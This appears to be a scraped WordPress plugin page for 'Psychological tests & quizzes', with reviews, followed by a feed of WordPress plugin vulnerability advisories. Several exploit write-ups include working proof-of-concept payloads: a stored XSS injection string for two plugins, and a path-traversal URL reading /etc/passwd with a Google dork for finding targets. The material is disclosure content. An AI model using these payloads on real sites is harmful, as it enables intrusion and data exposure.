Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress possible for users with contributor or higher role via &wpt_test_page_submit_button_caption parameter.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of April 26, 2022 and is not available for download. This closure is temporary, pending a full review.

![](https://secure.gravatar.com/avatar/4b86265be07d2b470a76420fa237b899?s=60&d=retro&r=g)

There is no better plugin than this for this domain.

![](https://secure.gravatar.com/avatar/3652ada8e3ab4497e4960f6d344929e0?s=60&d=retro&r=g)

The plug-in is very good, but there are some incompatibilities. such as Incompatible with the theme's label cloud, resulting in no color display. This is a very powerful WP plug-in I've seen. If the page of submitting results can be displayed, for example; Gender, age, test time and date, that's more perfect

![](https://secure.gravatar.com/avatar/f99995e094d67b5ceeff6b661cc04a5d?s=60&d=retro&r=g)

It works excellent, I would add the possibility of doing mathematical calculations not as conditionals but to obtain numerical results, to do tests that require simple calculations such as: Quality\_of\_life = (anxiety + depression + work) / 2 Then: If: quality\_of\_life> = 5 then: Quality of life: Good

![](https://secure.gravatar.com/avatar/4a8793793a78b222ddaaa69822b40515?s=60&d=retro&r=g)

This is a great plugin I have seen ever, But if getting more updates will be more fantastic

![](https://secure.gravatar.com/avatar/365c3a86e210d343807a9941e85defee?s=60&d=retro&r=g)

I have used this plugin now for several different tests/quizzes - some simple ones and one very complex one with a lot of customization. Works like a dream!

![](https://secure.gravatar.com/avatar/45cb0397d670d0b3fe240cf48b508b2f?s=60&d=retro&r=g)

Does a fantastic job of a complex situation. Is a bit tricky to setup, but allows a number of ways to configure tests/assessments and matched our need very well.

Read all 103 reviews

“Psychological tests & quizzes” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2022-27854: Psychological tests & quizzes

Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload.

CVE-2021-36895: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

WordPress Coru LFMember plugin version 1.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Coru LFMember - Stored Cross SiteScripting# Date: 26-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/# Version: 1.0.2# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:```<td class="manage-column"><input type="text" value="<?php print$result['game_image'] ?>" name="game_image[]" /></td><td class="manage-column"><?php printstripslashes($result['game_name_short']) ?></td><td class="manage-column"><input type="text" value="<?php printstripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td><td class="manage-column"><textarea name="game_description[]" rows="4"cols="10"><?php print stripslashes($result['game_description'])?></textarea></td><td class="manage-column"><input type="text" value="<?php print$result['game_link'] ?>" name="game_link[]" /></td>```# POC1. Install the Coru LFMember WordPress plugin and activate it.2. Go to LFMember -> Add New and inject XSS payload “><img src=xonerror=alert(1)> in the fields given i.e, Game Image Name, Game ShortName, Game Long Name, Game Description, and Links to.3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/kZDtIVz

WordPress Coru LFMember 1.0.2 Cross Site Scripting

WordPress WP-Invoice plugin version 4.3.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin  WP-Invoice - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/# Version: 4.3.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:``` wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';``# POC1.  Install the WP-Invoice WordPress plugin and activate it.2. Go to WP-Invoice settings  and inside the Business Name field inject XSSpayload “><img src=x onerror=alert(1)>3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/rsHIEO9

WordPress WP-Invoice 4.3.1 Cross Site Scripting

Plugin Settings Update vulnerability in ShortPixel's ShortPixel Adaptive Images plugin <= 3.3.1 at WordPress allows an attacker with a low user role like a subscriber or higher to change the plugin settings.

CVE-2022-29417: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - LocalFile Inclusion - Unauthenticated# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/# Version: 1.0.3# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable File: tblight.php# Vulnerable Code:```if(!empty($_GET['controller']) && !empty($_GET['action']) &&!empty($_GET['ajax']) && $_GET['ajax'] == 1){    require_once('' . 'controllers/'.$_GET['controller'].'.php');}```# Proof of concept:http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1># POC image:https://prnt.sc/9O8_akDp2HPC

CVE-2022-1391: WordPress Cab-Fare-Calculator 1.0.3 Local File Inclusion ≈ Packet Storm

The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.

CVE-2021-25094

The Menubar WordPress plugin before 5.8 does not sanitise and escape the command parameter before outputting it back in the response via the menubar AJAX action (available to any authenticated users), leading to a Reflected Cross-Site Scripting

CVE-2022-1152

The Anti-Malware Security and Brute-Force Firewall WordPress plugin before 4.20.96 does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters

CVE-2022-0953

The Page Restriction WordPress (WP) WordPress plugin before 1.2.7 allows bad actors with administrator privileges to the settings page to inject Javascript code to its settings leading to stored Cross-Site Scripting that will only affect administrator users.

Tag

#wordpress